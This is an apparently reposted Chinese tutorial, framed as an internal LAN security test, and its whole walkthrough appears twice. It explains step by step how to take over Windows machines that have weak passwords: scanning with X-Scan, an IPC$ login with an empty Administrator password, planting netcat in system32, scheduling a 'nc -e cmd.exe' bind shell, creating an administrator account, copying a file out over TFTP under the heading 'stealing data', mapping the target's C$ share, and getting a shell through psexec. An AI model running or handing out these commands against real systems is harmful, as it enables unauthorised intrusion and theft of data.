局域网内部安全测试--------利用弱密码控制远程计算机
2006-05-05 12:24
555 查看
先扫描内部网段(网上扫描软件很多,我习惯用X-Scan),获得弱密码
可以看到现在已经扫描出来许多弱密码,可以进一步控制
首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接
copy nc.exe //10.1.12.84/admin$/system32, nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具。
nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。
net time //10.1.12.84
查看对方计算机时间,以便利用计划任务 上午 08:40
at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业,其作业 ID = 1
添加一个任务,在08:42运行;运行之后将开放一个端口:5000
可以通过这个端口获得一个shell ,即控制台
运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.
出现C:/WINDOWS/system32>
现在就成功进入了对方计算机,管理员权限。
现在测试一下能否在对方计算机上执行命令
查看用户
net user
3个用户
添加一个用户试试。
net user testuser testpass /add
命令成功完成
查看用户
net user
4个用户
将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成
看看刚添加的用户情况
net user testuser
管理员Administrators组
删除用户
net user testuser /del
ipconfig 看它的IP : 10.1.12.84
窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回
退出。
再测试一下磁盘映射,现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑,多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del
利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了!
C:/WINDOWS/system32>
退出!
删除连接
net use //10.1.12.84/ipc$ /del
演示结束,谢谢 !
可以看到现在已经扫描出来许多弱密码,可以进一步控制
首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接
copy nc.exe //10.1.12.84/admin$/system32, nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具。
nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。
net time //10.1.12.84
查看对方计算机时间,以便利用计划任务 上午 08:40
at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业,其作业 ID = 1
添加一个任务,在08:42运行;运行之后将开放一个端口:5000
可以通过这个端口获得一个shell ,即控制台
运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.
出现C:/WINDOWS/system32>
现在就成功进入了对方计算机,管理员权限。
现在测试一下能否在对方计算机上执行命令
查看用户
net user
3个用户
添加一个用户试试。
net user testuser testpass /add
命令成功完成
查看用户
net user
4个用户
将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成
看看刚添加的用户情况
net user testuser
管理员Administrators组
删除用户
net user testuser /del
ipconfig 看它的IP : 10.1.12.84
窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回
退出。
再测试一下磁盘映射,现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑,多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del
利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了!
C:/WINDOWS/system32>
退出!
删除连接
net use //10.1.12.84/ipc$ /del
演示结束,谢谢 !
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 局域网内部安全测试--------利用弱密码控制远程计算机
- 利用远程桌面连接实现外网对局域网计算机的控制
- 利用远程桌面连接实现外网对局域网计算机的控制
- 利用远程桌面连接实现外网对局域网计算机的控制
- 局域网远程控制计算机管理
- 利用SSH远程连接主控端局域网计算机命令
- 利用Windows2003 IP安全策略实现服务器远程桌面端口(3389)访问控制
- Linux系统利用SSH远程控制安全问题
- 局域网内计算机远程开机、控制和关机
- XP系统下,远程桌面控制,(确保两台计算机在同一个局域网内)
- 利用Windows2003 IP安全策略实现服务器远程桌面端口(3389)访问控制
- 远程控制局域网计算机的方法
- webservice远程测试显示 “测试窗体只能用于来自本地计算机的请求”
- 利用C#重启远程计算机
- SSH服务远程访问及控制(1基于口令的安全验证)
- 利用QQ轻松实现远程控制
- 局域网远程控制电脑
- 网站漏洞检测之用户密码找回网站漏洞的安全分析与利用
- 【安全】测试校园网认证系统帐号密码
- win 10 远程连接出现 "由于安全设置错误, 客户端无法连接到远程计算机. 确定你已登录到网络后.” 错误